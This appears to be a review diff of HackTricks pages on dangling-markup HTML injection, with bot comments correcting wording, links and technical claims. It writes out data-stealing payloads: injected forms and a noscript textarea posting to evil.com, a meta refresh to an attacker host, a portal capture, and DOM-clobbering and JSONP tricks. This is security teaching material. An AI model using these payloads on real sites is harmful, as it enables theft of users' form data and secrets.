@ -68,11 +67,11 @@ steal me'<b>test</b>
Then, the forms that send data to path (like `<form action='update_profile.php'>`) will send the data to the malicious domain. Then, the forms that send data to path (like `<form action='update_profile.php'>`) will send the data to the malicious domain.
## Stealing forms 2 ### Stealing forms 2
Set a form header: `<form action='http://evil.com/log_steal'>` this will overwrite the next form header and all the data from the form will be sent to the attacker. Set a form header: `<form action='http://evil.com/log_steal'>` this will overwrite the next form header and all the data from the form will be sent to the attacker.
## Stealing forms 3 ### Stealing forms 3
The button can change the URL where the information of the form is going to be sent with the attribute "formaction": The button can change the URL where the information of the form is going to be sent with the attribute "formaction":
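Review bot: "this will overwrite the next form header" under "Stealing forms 2" gives the effect but not the mechanism, and the mechanism decides when it works: forms do not nest, so the HTML parser ignores a `<form>` start tag while another form is open, and every input after the injected `<form action='http://evil.com/log_steal'>` up to the first `</form>` belongs to the attacker's form. It therefore needs the injection before the legitimate `<form>` and the victim to submit. The `formaction` variant under "Stealing forms 3" likewise needs the injected button inside the target form and a click on that button; both are user-interaction leaks, unlike the `<img>` case above.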
@ -82,7 +81,7 @@ The button can change the URL where the information of the form is going to be s
An attacker can use this to steal the information. An attacker can use this to steal the information.
## Stealing clear text secrets 2 ### Stealing clear text secrets 2
Using the latest mentioned technique to steal forms (injecting a new form header) you can then inject a new input field: Using the latest mentioned technique to steal forms (injecting a new form header) you can then inject a new input field:
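Review bot: "Using the latest mentioned technique" on the touched paragraph should be "the last-mentioned technique"; "latest" reads as "newest".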
@ -98,7 +97,7 @@ You can do the same thing injecting a form and an `<option>` tag. All the data u
<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option <form action=http://google.com><input type="submit">Click Me</input><select name=xss><option
``` ```
## Form parameter injection ### Form parameter injection
You can change the path of a form and insert new values so an unexpected action will be performed: You can change the path of a form and insert new values so an unexpected action will be performed:
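Review bot: `<input type="submit">Click Me</input>` in the context block is not valid HTML: `input` is a void element, the parser drops the `</input>` end tag, "Click Me" becomes stray text and the button shows the browser's default label. Use `<input type="submit" value="Click Me">` or a `<button>` so the lure reads as intended. The dangling `<option` works because the parser keeps consuming the following markup as attributes and then as the option's text, so whatever the user submits includes the page content up to the next `</select>` or `</form>`.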
@ -116,7 +115,7 @@ You can change the path of a form and insert new values so an unexpected action
</form> </form>
``` ```
## Stealing clear text secrets via noscript ### Stealing clear text secrets via noscript
`<noscript></noscript>` Is a tag whose content will be interpreted if the browser doesn't support javascript (you can enable/disable Javascript in Chrome in [chrome://settings/content/javascript](chrome://settings/content/javascript)). `<noscript></noscript>` Is a tag whose content will be interpreted if the browser doesn't support javascript (you can enable/disable Javascript in Chrome in [chrome://settings/content/javascript](chrome://settings/content/javascript)).
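Review bot: "interpreted if the browser doesn't support javascript" on the `<noscript>` paragraph understates the condition: the contents are parsed as markup only when scripting is disabled for that document (user setting, a NoScript-style extension, or an iframe `sandbox` without `allow-scripts`); with scripting enabled they are raw text. A CSP that merely blocks script execution does not flip that flag, so this payload is not a CSP bypass on its own.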
@ -126,7 +125,7 @@ A way to exfiltrate the content of the web page from the point of injection to t
<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript> <noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>
``` ```
## Bypassing CSP with user interaction ### Bypassing CSP with user interaction
From this [portswiggers research](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) you can learn that even from the **most CSP restricted** environments you can still **exfiltrate data** with some **user interaction**. In this occasion we are going to use the payload: From this [portswiggers research](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) you can learn that even from the **most CSP restricted** environments you can still **exfiltrate data** with some **user interaction**. In this occasion we are going to use the payload:
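Review bot: the payload on the first line of this hunk carries `type=submit` twice on the same `<input>`; duplicate attributes are a parse error and the second copy is discarded, so drop one. The `<textarea name=contents>` is deliberately left open: it swallows the rest of the page as its value until a `</textarea>` appears, and the full-screen transparent submit button is what turns any click into a submission, so this is a user-interaction leak like the form variants above.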
@ -145,7 +144,7 @@ if(window.name) {
</script> </script>
``` ```
## Misleading script workflow 1 - HTML namespace attack ### Misleading script workflow 1 - HTML namespace attack
Insert a new tag with and id inside the HTML that will overwrite the next one and with a value that will affect the flow of a script. In this example you are selecting with whom a information is going to be shared: Insert a new tag with and id inside the HTML that will overwrite the next one and with a value that will affect the flow of a script. In this example you are selecting with whom a information is going to be shared:
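Review bot: "Insert a new tag with and id" and "a information" on the touched paragraph should read "with an id" and "the information". The reason it "overwrites the next one" is that `document.getElementById` returns the first element in tree order with that id, so the trick only works when the injection point precedes the legitimate element.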
@ -164,7 +163,7 @@ function submit_status_update() {
} }
``` ```
## Misleading script workflow 2 - Script namespace attack ### Misleading script workflow 2 - Script namespace attack
Create variables inside javascript namespace by inserting HTML tags. Then, this variable will affect the flow of the application: Create variables inside javascript namespace by inserting HTML tags. Then, this variable will affect the flow of the application:
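Review bot: "Create variables inside javascript namespace by inserting HTML tags" is DOM clobbering and should be named as such, with its limits stated in the same paragraph: only `id` on any element, and `name` on `form`, `img`, `iframe`, `embed` and `object`, create named properties on `window`/`document`, and a global the script declares itself with `var` or `function` shadows the clobbered element. The target therefore has to be an otherwise undefined global read such as `if (window.x)`, not a declared variable.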
@ -190,7 +189,7 @@ function submit_new_acls() {
} }
``` ```
## Abuse of JSONP ### Abuse of JSONP
If you find a JSONP interface you could be able to call an arbitrary function with arbitrary data: If you find a JSONP interface you could be able to call an arbitrary function with arbitrary data:
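Review bot: the JSONP paragraph should say why it matters for dangling markup and CSP: the attacker only needs a `<script src>` injection (no inline script), and it passes a CSP whenever the JSONP host is in `script-src`, which is why allowlisted origins with JSONP endpoints are the classic CSP bypass. The server-side fix is to restrict the callback name to a strict identifier pattern, which the `call=alert(1)` example in the next hunk shows is not done there.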
@ -212,7 +211,7 @@ Or you can even try to execute some javascript:
<script src='/search?q=a&call=alert(1)'></script> <script src='/search?q=a&call=alert(1)'></script>
``` ```
## Iframe abuse ### Iframe abuse
Notice that a **child document can view and set location property for parent, even if cross-origin.** This means that you can make the client access any other page by loading inside an **iframe** some code like: Notice that a **child document can view and set location property for parent, even if cross-origin.** This means that you can make the client access any other page by loading inside an **iframe** some code like:
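Review bot: "a child document can view and set location property for parent, even if cross-origin" is half right: a cross-origin frame can assign `parent.location` (and call `assign`/`replace`) but cannot read it, so "view" should go. Also, Chrome has required a user gesture for a cross-origin iframe to navigate the top frame since its 2018 framebusting intervention, so "make the client access any other page" needs a click in practice unless the frame is same-origin or sandboxed with `allow-top-navigation`.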
@ -222,13 +221,13 @@ Notice that a **child document can view and set location property for parent, ev
This can be mitigated with something like: _**sandbox= allow-scripts allow-top-navigation**_ This can be mitigated with something like: _**sandbox= allow-scripts allow-top-navigation**_
## \<meta abuse ### \<meta abuse
You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect (in 5s in this case): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />` You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect (in 5s in this case): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
This can be **avoided** with a **CSP** regarding **http-equiv** ( `Content-Security-Policy: default-src 'self';`, or `Content-Security-Policy: http-equiv 'self';`) This can be **avoided** with a **CSP** regarding **http-equiv** ( `Content-Security-Policy: default-src 'self';`, or `Content-Security-Policy: http-equiv 'self';`)
## New \<portal HTML tag ### New \<portal HTML tag
You can find a very **interesting research** on exploitable vulnerabilities of the \<portal tag [here](https://research.securitum.com/security-analysis-of-portal-element/).\ You can find a very **interesting research** on exploitable vulnerabilities of the \<portal tag [here](https://research.securitum.com/security-analysis-of-portal-element/).\
At the moment of this writing you need to enable the portal tag on Chrome in `chrome://flags/#enable-portals` or it won't work. At the moment of this writing you need to enable the portal tag on Chrome in `chrome://flags/#enable-portals` or it won't work.
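Review bot: the mitigation line "sandbox= allow-scripts allow-top-navigation" grants exactly the permission that lets a framed document navigate the top page; the mitigation is a `sandbox` attribute that omits `allow-top-navigation` (or uses `allow-top-navigation-by-user-activation`), so the example as written mitigates nothing. In the same hunk, `<meta http-equiv="Set-Cookie">` is no longer honoured by current browsers (Chrome dropped it in 65, Firefox in 68), `Content-Security-Policy: http-equiv 'self'` is not a CSP directive, and `default-src 'self'` does not govern a `meta refresh`; the "can be avoided with a CSP" sentence should be reworded rather than carried over under the new heading level.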
@ -237,23 +236,23 @@ At the moment of this writing you need to enable the portal tag on Chrome in `ch
<portal src='https://attacker-server? <portal src='https://attacker-server?
``` ```
## HTML Leaks ### HTML Leaks
Not all the ways to leak connectivity in HTML will be useful for Dangling Markup, but sometimes it could help. Check them here: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html) Not all the ways to leak connectivity in HTML will be useful for Dangling Markup, but sometimes it could help. Check them here: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
# Char-by-char Leaks ## Char-by-char Leaks
You can find techniques like **CSS injection or Lazy Load Images** explained in this post to **leak secrets from a HTML without JS execution char by char**: You can find techniques like **CSS injection or Lazy Load Images** explained in this post to **leak secrets from a HTML without JS execution char by char**:
{% content-ref url="dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/" %} {% content-ref url="html-injection-char-by-char-exfiltration/" %}
[html-injection-char-by-char-exfiltration](dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/) [html-injection-char-by-char-exfiltration](html-injection-char-by-char-exfiltration/)
{% endcontent-ref %} {% endcontent-ref %}
# Brute-Force Detection List ## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %} {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %}
# References ## References
All the techniques presented here and more can view reviewed with more details in: All the techniques presented here and more can view reviewed with more details in:
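Review bot: "can view reviewed with more details in" on the last touched line should be "can be reviewed in more detail in". The content-ref change from `dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/` to `html-injection-char-by-char-exfiltration/` is the correct relative path once this page lives in that directory. The `<portal src='https://attacker-server?` payload is the same next-quote capture as the `<img>` case and, as the text says, only works behind `chrome://flags/#enable-portals`, so it should be presented as experimental rather than as a primary technique.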
@ -267,7 +266,6 @@ More info:
{% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" %} {% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -283,5 +281,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -46,7 +46,7 @@ If the introduced data may somehow being reflected in the response, the page mig
* [ ] [**Client Side Template Injection**](client-side-template-injection-csti.md) * [ ] [**Client Side Template Injection**](client-side-template-injection-csti.md)
* [ ] [**Command Injection**](command-injection.md) * [ ] [**Command Injection**](command-injection.md)
* [ ] [**CRLF**](crlf-0d-0a.md) * [ ] [**CRLF**](crlf-0d-0a.md)
* [ ] [**Dangling Markup**](dangling-markup-html-scriptless-injection.md) * [ ] [**Dangling Markup**](dangling-markup-html-scriptless-injection/)
* [ ] [**File Inclusion/Path Traversal**](file-inclusion/) * [ ] [**File Inclusion/Path Traversal**](file-inclusion/)
* [ ] [**Open Redirect**](open-redirect.md) * [ ] [**Open Redirect**](open-redirect.md)
* [ ] [**Prototype Pollution to XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss) * [ ] [**Prototype Pollution to XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)

View file

@ -37,7 +37,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
2. Can you use events or attributes supporting `javascript:` protocol? 2. Can you use events or attributes supporting `javascript:` protocol?
3. Can you bypass protections? 3. Can you bypass protections?
4. Is the HTML content being interpreted by any client side JS engine (_AngularJS_, _VueJS_, _Mavo_...), you could abuse a [**Client Side Template Injection**](../client-side-template-injection-csti.md). 4. Is the HTML content being interpreted by any client side JS engine (_AngularJS_, _VueJS_, _Mavo_...), you could abuse a [**Client Side Template Injection**](../client-side-template-injection-csti.md).
5. If you cannot create HTML tags that execute JS code, could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection.md)? 5. If you cannot create HTML tags that execute JS code, could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection/)?
2. Inside a **HTML tag**: 2. Inside a **HTML tag**:
1. Can you exit to raw HTML context? 1. Can you exit to raw HTML context?
2. Can you create new events/attributes to execute JS code? 2. Can you create new events/attributes to execute JS code?
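Review bot: item 4 of the list mixes a question with a statement ("Is the HTML content being interpreted by any client side JS engine ..., you could abuse"); make it match the neighbouring items: "Is the HTML content interpreted by a client-side JS engine (AngularJS, VueJS, Mavo...)? Then you could abuse a Client Side Template Injection." The trailing-slash link in item 5 is consistent with the directory move.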
@ -225,7 +225,7 @@ If in order to exploit the vulnerability you need the **user to click a link or
#### Impossible - Dangling Markup #### Impossible - Dangling Markup
If you just think that **it's impossible to create an HTML tag with an attribute to execute JS code**, you should check [**Danglig Markup** ](../dangling-markup-html-scriptless-injection.md)because you could **exploit** the vulnerability **without** executing **JS** code. If you just think that **it's impossible to create an HTML tag with an attribute to execute JS code**, you should check [**Danglig Markup** ](../dangling-markup-html-scriptless-injection/)because you could **exploit** the vulnerability **without** executing **JS** code.
### Injecting inside HTML tag ### Injecting inside HTML tag
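Review bot: the touched line still has "Danglig Markup" in the link text and a stray space before the closing `]`; since the line is being rewritten for the new path anyway, make it `[**Dangling Markup**](../dangling-markup-html-scriptless-injection/)`.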

View file

@ -1,4 +1,4 @@
# Stealing Sensitive Information Disclosure from a Web
<details> <details>
@ -16,15 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
If at some point you find a **web page that presents you sensitive information based on your session**: Maybe it's reflecting cookies, or printing or CC details or any other sensitive information, you may try to steal it.\ If at some point you find a **web page that presents you sensitive information based on your session**: Maybe it's reflecting cookies, or printing or CC details or any other sensitive information, you may try to steal it.\
Here I present you the main ways to can try to achieve it: Here I present you the main ways to can try to achieve it:
* [**CORS bypass**](pentesting-web/cors-bypass.md): If you can bypass CORS headers you will be able to steal the information performing Ajax request for a malicious page. * [**CORS bypass**](pentesting-web/cors-bypass.md): If you can bypass CORS headers you will be able to steal the information performing Ajax request for a malicious page.
* [**XSS**](pentesting-web/xss-cross-site-scripting/): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information. * [**XSS**](pentesting-web/xss-cross-site-scripting/): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information.
* [**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection.md): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags. * [**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection/): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags.
* [**Clickjaking**](pentesting-web/clickjacking.md): If there is no protection against this attack, you may be able to trick the user into sending you the sensitive data (an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)). * [**Clickjaking**](pentesting-web/clickjacking.md): If there is no protection against this attack, you may be able to trick the user into sending you the sensitive data (an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)).
<details> <details>
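Review bot: the touched bullet reads "Danging Markup"; while it is edited for the new path, fix it to "Dangling Markup", and "Clickjaking" on the following bullet to "Clickjacking". Two grammar slips in the context lines: "the main ways to can try to achieve it" should be "the main ways you can try to achieve it", and "performing Ajax request for a malicious page" should be "performing an Ajax request from a malicious page". The hunk header shows two lines removed (15 to 13) that the rendered view does not display; confirm they are blank lines and not the link list's trailing sentence.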
@ -41,5 +39,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>